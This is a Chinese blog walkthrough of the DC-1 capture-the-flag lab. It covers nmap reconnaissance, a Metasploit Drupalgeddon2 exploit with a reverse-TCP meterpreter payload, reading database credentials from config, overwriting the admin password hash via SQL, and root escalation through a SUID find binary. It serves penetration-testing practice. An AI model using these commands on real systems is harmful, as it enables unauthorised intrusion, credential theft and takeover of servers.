当前位置: 首页 > news >正文

赣州网站建设 赣州网页设计微信小程序制作文档

赣州网站建设 赣州网页设计,微信小程序制作文档,广州有什么好玩的室内,网站写文案以前写过了#xff0c;有一些忘了#xff0c;快速的重温一遍。 DC一共九个靶场#xff0c;目标一天一个。 文章目录环境配置#xff1a;信息搜集#xff1a;漏洞复现#xff1a;FLAG获取环境配置#xff1a; 最简单的办法莫过于将kali和DC-1同属为一个nat的网络下。 信…以前写过了有一些忘了快速的重温一遍。 DC一共九个靶场目标一天一个。 文章目录环境配置信息搜集漏洞复现FLAG获取环境配置 最简单的办法莫过于将kali和DC-1同属为一个nat的网络下。 信息搜集 首先探测靶机ip两种方法 arp-scan -l nmap -sP 192.168.28.0/24靶机ip为192.168.28.129 明显有一个80端口继续用nmap探测端口情况。 还开起了22和111端口wappalyzer信息搜集看一下框架。 或者用kali自带的whatweb指纹探测。 whatweb -v 192.168.28.129同样得到的是Drupal7.0版本msfconsole里存在Drupal攻击模块。 漏洞复现 search去找Drupal模块 search Drupal进入exploit/unix/webapp/drupal_drupalgeddon2模块然后查看payload。 use exploit/unix/webapp/drupal_drupalgeddon2 show payloadsphp/meterpreter/reverse_tcp可以利用。 然后设置payload和配置。 set payload /php/meterpreter/reverse_tcp set RHOSTS 192.168.28.129输入exploit启动。 成功拿到shell先反弹shell。 python -c import pty;pty.spawn(/bin/bash)FLAG获取 然后ls -l发现flag1. Every good CMS needs a config file - and so do you 每个好的CMS都需要一个配置文件 - 你也是明显是想让我们去查看配置文件。 发现settings.php文件查看后得到flag2. Brute force and dictionary attacks arent the* only ways to gain access (and you WILL need access).* What can you do with these credentials? 蛮力和字典攻击不是*只有获得访问权限的方法您将需要访问权限。* 您可以使用这些凭据做什么不能爆破但在配置中存在mysql账号密码可以通过mysql查看账号密码。 mysql -udbuser -pR0ck3t登录mysql。 在其中找到user表。 但其中的pass被加密猜测存在哈希加密代码查找。 find . -name *hash*找到的password-hash.sh这肯定是加密代码cat一下。 #!/usr/bin/php ?php/*** Drupal hash script - to generate a hash from a plaintext password** Check for your PHP interpreter - on Windows youll probably have to* replace line 1 with* #!c:/program files/php/php.exe** param password1 [password2 [password3 ...]]* Plain-text passwords in quotes (or with spaces backslash escaped).*/if (version_compare(PHP_VERSION, 5.2.0, )) {$version PHP_VERSION;echo EOFERROR: This script requires at least PHP version 5.2.0. You invoked it withPHP version {$version}. \n EOF;exit; }$script basename(array_shift($_SERVER[argv]));if (in_array(--help, $_SERVER[argv]) || empty($_SERVER[argv])) {echo EOFGenerate Drupal password hashes from the shell.Usage: {$script} [OPTIONS] plan-text password Example: {$script} mynewpasswordAll arguments are long options.--help Print this page.--root pathSet the working directory for the script to the specified path.To execute this script this has to be the root directory of yourDrupal installation, e.g. /home/www/foo/drupal (assuming Drupalrunning on Unix). Use surrounding quotation marks on Windows.password1 [password2 [password3 ...]]One or more plan-text passwords enclosed by double quotes. Theoutput hash may be manually entered into the {users}.pass field tochange a password via SQL to a known value.To run this script without the --root argument invoke it from the root directory of your Drupal installation as./scripts/{$script} \n EOF;exit; }$passwords array();// Parse invocation arguments. while ($param array_shift($_SERVER[argv])) {switch ($param) {case --root:// Change the working directory.$path array_shift($_SERVER[argv]);if (is_dir($path)) {chdir($path);}break;default:// Add a password to the list to be processed.$passwords[] $param;break;} }define(DRUPAL_ROOT, getcwd());include_once DRUPAL_ROOT . /includes/password.inc; include_once DRUPAL_ROOT . /includes/bootstrap.inc;foreach ($passwords as $password) {print(\npassword: $password \t\thash: . user_hash_password($password) .\n); } print(\n);先看帮助理解脚本如何使用。 然后运行脚本然后得到加密过后密码随后密码替换。 update users set pass$S$Ds.RBZ79FgPXwUiHZZd5eo2rVbYQzTomLgBhA24Sw04Bnr3UWSpBwhere nameadmin;然后登录网站得到flag3 Special PERMS will help FIND the passwd - but you’ll need to -exec that command to work out how to get what’s in the shadow. 特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取阴影中的东西。在/etc/passwd中发现flag4用户。 得到flag4。 Can you use this same method to find or access the flag in root?Probably. But perhaps its not that easy. Or maybe it is? 您可以使用相同的方法来查找或访问 root 中的标志吗 可能。但也许这并不容易。 或者也许是访问root文件夹需要root权限。 SUID提权: find / -user root -perm -4000 -print 2/dev/null其中就有find直接用。 find / -exec /bin/bash -p \;进入root目录得到最后的flag。 Well done!!!!Hopefully youve enjoyed this and learned some new skills.You can let me know what you thought of this little journey by contacting me via Twitter - DCAU7 干的好希望您喜欢这个并学到了一些新技能。你可以让我知道你对这个小旅程的看法 通过推特与我联系 - DCAU7利用hydra暴力破解得到flag4的密码。
http://www.hkea.cn/news/14276586/

相关文章:

  • 网站后台关键词设置apache搭建多个网站
  • 北京出名做网站的公司网站建设奖项
  • 丽水房产网站建设外包网络优化
  • 周口市住房和城乡建设局门户网站通信管理局网站备案
  • 公司要我做网站_没有公司的材料是不是不可以做做网站一定需要服务器吗
  • 容桂电子商务网站建设深圳网站设计灵点网络品牌
  • 公司网站如何备案做网站需要学编程吗
  • 永济市住房保障和城乡建设管理局网站哪个网站专注做微信模板
  • 保康网站建设定制摄影app和摄影网站的区别
  • 我是这样做网站的米课四年级说新闻2023
  • 构建自己的网站产品毕业设计代做网站
  • 专业简历制作网站模板网络推广专员考核指标
  • 网站建设收费明细做企业网站公司报价
  • 大型茶叶网站建设爱站网为什么不能用了
  • 网站运营者保障网装修网官网
  • 合肥网站建设与设计永湖网站建设
  • 官方网站下载安装云支付室内设计网站论坛
  • 大型门户网站建设效果好吗杭州百度百家号seo优化排名
  • 手机触屏网站模板led灯具网站模板
  • 网站百度推广和优化整站快速排名
  • 怎么做国内网站wordpress插件 地图
  • 网站优化西安黄山新洲建设集团网站
  • 宁波网站建设公司哪个好泰安房产网签成交数据
  • 门户网站开发工作室wordpress 标签不显示图片
  • 购物网站开发将商品导入数据库深圳建站公司优化
  • 网站模板 哪家好茂名seo快速排名外包
  • 大连网站制作公司费用多少一个网站做两个语言模板可以吗
  • 太原做网站的北京旅游网站建设
  • 策划案网站做网站多少钱PageAdmin
  • 照明网站建设网络上做假网站做物流